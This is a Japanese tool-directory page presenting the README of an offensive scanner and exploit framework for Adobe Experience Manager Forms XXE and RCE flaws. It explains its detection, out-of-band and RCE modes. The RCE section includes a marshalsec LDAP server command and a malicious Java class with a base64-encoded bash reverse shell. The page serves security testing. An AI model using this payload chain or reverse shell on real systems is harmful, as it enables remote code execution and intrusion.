Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
AEMPWN — CVE-2025-54253 | CVE-2025-54254 | Adobe Experience Manager Forms XXE → RCE フレームワーク | Kitploit
ツール/GitHubGitHub/zoomdbz/aempwn
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubzoomdbz/aempwn

AEMPWN

CVE-2025-54253 | CVE-2025-54254 | Adobe Experience Manager Forms XXE → RCE フレームワーク

リポジトリを見る
36ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

AEMPWN

CVE-2025-54253 および CVE-2025-54254 向け AEM Forms スキャナ

AEMPWN は、高リスクの Adobe Experience Manager (AEM) Forms の脆弱性を特定するためのターゲット型スキャナです。安全な検出、ブラインド帯域外 (OOB) 確認、完全な概念実証 (PoC) 検証ワークフローをサポートします。 このツールは、許可されたセキュリティテスト専用に設計されています。

サポートされている脆弱性

CVE-2025-54253 AEM Forms (JEE) における設定依存のリモートコード実行

CVE-2025-54254 ファイル開示とその後の権限昇格につながる XML 外部実体 (XXE) インジェクション

動作モード AEMPWN は、実際のバウンティやレッドチームのワークフローに合わせた 3 つの実行モードをサポートしています。

  1. セーフ PoC モード (--poc)

目的: 破壊的な動作を引き起こさずに、安全でない XML パース動作と悪用可能な攻撃面を特定します。

検証内容: XML リフレクション HTML 以外の構造化レスポンス カナリアトークンのリフレクション 安全でない XML 処理の兆候

使用するタイミング: ノイズの少ない検証を行いたい場合 まだ影響範囲を調査している場合 エスカレーション前に安全なシグナルが必要な場合 このモードは、初期トリアージや内部レポートに適しています。

  1. OOB XXE モード (--oob)

目的: AEM サーバーからのアウトバウンドリクエストによるブラインド XXE を確認します。

重要な補足: Burp Collaborator (または類似のサービス) はアウトバウンド接続を監視するだけです。それらは以下のことはできません: 任意の DTD ファイルをホストする 悪意のあるペイロードを配信する 攻撃者が制御するレスポンスを返す LDAP/JNDI エクスプロイトをサポートする

このため、Collaborator だけでは完全な OOB XXE エクスプロイトには不十分です。

必要なもの: 制御下にある HTTP サーバー (VPS、クラウドインスタンス、トンネリング付きローカルサーバーなど) DTD ファイルを配信できること インバウンド HTTP リクエストとクエリパラメータを監視できること

これが証明できること: XML パーサーが外部実体を取得する ターゲットがアウトバウンドネットワークリクエストを行う 機密のローカルファイルが読み取られ、外部に持ち出される可能性がある

  1. RCE モード (--rce)

目的: P1 レベルの影響を与える、AEM サーバー上での実際のコード実行を実証します。

このモードは、HTTP コールバックを超えたインフラストラクチャを必要とする、XML パースを介した JNDI インジェクションに依存しています。

必要なもの: Java クラス参照を配信できる稼働中の LDAP サーバー コンパイル済み Java クラスをホストする HTTP サーバー 制御された実行プリミティブ (例: ファイル作成、アウトバウンドコールバック)

LDAP が必要な理由: XML パーサーが JNDI 参照の解決を試みる これにより AEM サーバーが LDAP リスナーに接続する LDAP レスポンスが Java クラスを指す クラスが JVM によってロードされ実行される

最良のツール: marshalsec

root@kitploit:~
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://your-server/#Exploit" 1389

http://your-server/#Exploit = Exploit.class (コンパイル済み悪意あるクラス) を配信する HTTP サーバー。

悪意あるクラスの例 (touch /tmp/pwned またはリバースシェル):

root@kitploit:~
Javaimport java.io.IOException;
public class Exploit {
    static {
        try {
            Runtime.getRuntime().exec("touch /tmp/pwned");
            // or reverse shell: Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}");
        } catch (IOException e) {}
    }
} 

コンパイル → HTTP サーバー (DTD と同じでも別でも可) でホストします。 AEM がエンティティをパースすると → LDAP に接続 → クラスを取得 → コードを実行します。

主な制限:

Burp Collaborator は以下のことはできません: LDAP レスポンスを配信する Java クラスをホストする JNDI ベースのクラスロードをトリガーする このため、RCE モードは実際の LDAP サービスなしでは動作しません。

Burp Collaborator について Burp Collaborator (および類似のプラットフォーム) は検出のみに有効です。

確認できること: DNS ルックアップ HTTP または HTTPS コールバック ブラインドのアウトバウンド接続

できないこと: DTD ファイルのホスト 外部に持ち出されたファイル内容の処理 Java クラスの配信 JNDI または LDAP ベースのエクスプロイトのサポート

Collaborator はペイロードを配信するためではなく、監視のために使用してください。

出力:

確認された検出結果は、出力ファイル (デフォルト: aem-forms-scan.txt) に書き込まれ、以下を含みます: ターゲットのベース URL 影響を受けるエンドポイント 観測された検出シグナル モード固有の指標 Video-PoC に適した形式

ツールをダウンロード